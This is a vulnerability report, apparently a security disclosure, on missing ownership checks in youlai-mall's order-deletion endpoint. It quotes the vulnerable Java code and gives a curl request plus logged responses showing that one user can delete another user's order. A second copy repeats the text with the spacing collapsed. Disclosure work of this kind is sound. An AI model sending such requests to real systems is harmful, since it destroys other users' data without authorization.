youlai-mall improper access control in DELETE /mall-oms/app-api/v1/orders/{orderId} enables horizontal privilege escalation and unauthorized order deletion on victim accounts
Contributors: Huang Weigang
1. Vulnerability Impact
- youlai-mall (latest)
https://github.com/youlaitech/youlai-mall
2. Vulnerability Location
- DELETE
/mall-oms/app-api/v1/orders/{orderId}
3. Code Analysis
- File:
mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java
- Route and method:
@DeleteMapping("/{orderId}")public Result<Boolean> deleteOrder(@PathVariable Long orderId) { boolean result = orderService.deleteById(orderId); return Result.success(result);}
- Service:
mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/service/impl/OrderServiceImpl.java
public boolean deleteById(Long orderId) { return this.removeById(orderId);}
- Issues:
- No ownership check (missing validation that the provided
orderId belongs to the current logged-in member, e.g., comparing order's memberId with SecurityUtils.getMemberId()).
- No role/permission control (no
@PreAuthorize; any authenticated App user can delete arbitrary orders).
- Direct parameter trust (attacker-controlled
orderId is used directly in database deletion without authorization).
- Supports horizontal privilege escalation (attacker supplies victim's
orderId and can delete their orders).
- No state validation (missing check for order status; even paid/shipped orders could be deleted).
- Lacks deletion auditing and soft-delete mechanism (hard delete without logging who initiated it).
Vulnerability Reproduction
-- Preconditions
- Attacker has a valid App login token (
Authorization: Bearer <token>).
- Victim's
orderId is known or discoverable (via enumeration, sequential IDs, or other BOLA endpoints).
- Target Endpoint:
DELETE /mall-oms/app-api/v1/orders/{orderId}
-- Steps (horizontal privilege escalation: delete another user's order)
- Log in as User A (memberId=100) and obtain a valid token.
- Call the endpoint with User B's
orderId (e.g., orderId=5001):
curl -X DELETE -H "Authorization: Bearer <token>" "https://<gateway>/mall-oms/app-api/v1/orders/5001"
- Observe a 200 OK response, for example:
{"code":"00000","data":true,"msg":"一切ok"}
- Outcome: Without any ownership validation, User A successfully deletes User B's order, causing data loss and business disruption.
-- Example request/response log (reference)
- "data": {
- "request_data": {
- "method": "DELETE",
- "url": "
http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
- "params": {},
- "json": {},
- "data": {},
- "files": {}
},
- "response_data": {
- "code": "00000",
- "data": true,
- "msg": "一切ok"
}
},
- "test": {
- "request_data": {
- "method": "DELETE",
- "url": "
http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",
- "params": {},
- "json": {},
- "data": {},
- "files": {}
},
- "response_data": {
- "code": "00000",
- "data": true,
- "msg": "一切ok"
}
}
4. Impact Description
- Unauthorized data deletion
- Any logged-in user can delete arbitrary orders, causing permanent data loss and business record destruction.
- Horizontal privilege escalation (BOLA/IDOR)
- The
orderId path parameter is not validated against the authenticated user's identity, allowing cross-account operations.
- Business logic bypass
- Order deletion should respect business rules (e.g., only pending/cancelled orders can be deleted), but this endpoint allows deletion of any order regardless of status.
- Financial and operational impact
- Deleting paid or shipped orders can cause financial discrepancies, inventory mismatches, and fulfillment failures.
- Lack of audit trail and recovery
- Hard delete without logging makes forensic investigation impossible and prevents data recovery.
- Compliance violations
- E-commerce platforms typically require order retention for accounting, tax, and legal purposes; unauthorized deletion violates these requirements.
- Attack chain amplification
- When combined with order enumeration or creation endpoints, attackers can systematically disrupt business operations across multiple accounts.
- System trust erosion
- Users and administrators lose confidence in data integrity and platform reliability, damaging reputation and business continuity.
youlai-mall improper access control in DELETE /mall-oms/app-api/v1/orders/{orderId} enables horizontal privilege escalation and unauthorized order deletion on victim accounts
Contributors: Huang Weigang
1. Vulnerability Impact
https://github.com/youlaitech/youlai-mall2. Vulnerability Location
/mall-oms/app-api/v1/orders/{orderId}3. Code Analysis
mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/controller/app/OrderController.java@DeleteMapping("/{orderId}")public Result<Boolean> deleteOrder(@PathVariable Long orderId) {boolean result = orderService.deleteById(orderId);return Result.success(result);}mall-oms/oms-boot/src/main/java/com/youlai/mall/oms/service/impl/OrderServiceImpl.javapublic boolean deleteById(Long orderId) {return this.removeById(orderId);}orderIdbelongs to the current logged-in member, e.g., comparing order'smemberIdwithSecurityUtils.getMemberId()).@PreAuthorize; any authenticated App user can delete arbitrary orders).orderIdis used directly in database deletion without authorization).orderIdand can delete their orders).Vulnerability Reproduction
-- Preconditions
Authorization: Bearer <token>).orderIdis known or discoverable (via enumeration, sequential IDs, or other BOLA endpoints).DELETE /mall-oms/app-api/v1/orders/{orderId}-- Steps (horizontal privilege escalation: delete another user's order)
orderId(e.g., orderId=5001):curl -X DELETE -H "Authorization: Bearer <token>" "https://<gateway>/mall-oms/app-api/v1/orders/5001"{"code":"00000","data":true,"msg":"一切ok"}-- Example request/response log (reference)
http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",},
}
},
http://10.15.196.160:9999/mall-oms/app-api/v1/orders/5001",},
}
}
4. Impact Description
orderIdpath parameter is not validated against the authenticated user's identity, allowing cross-account operations.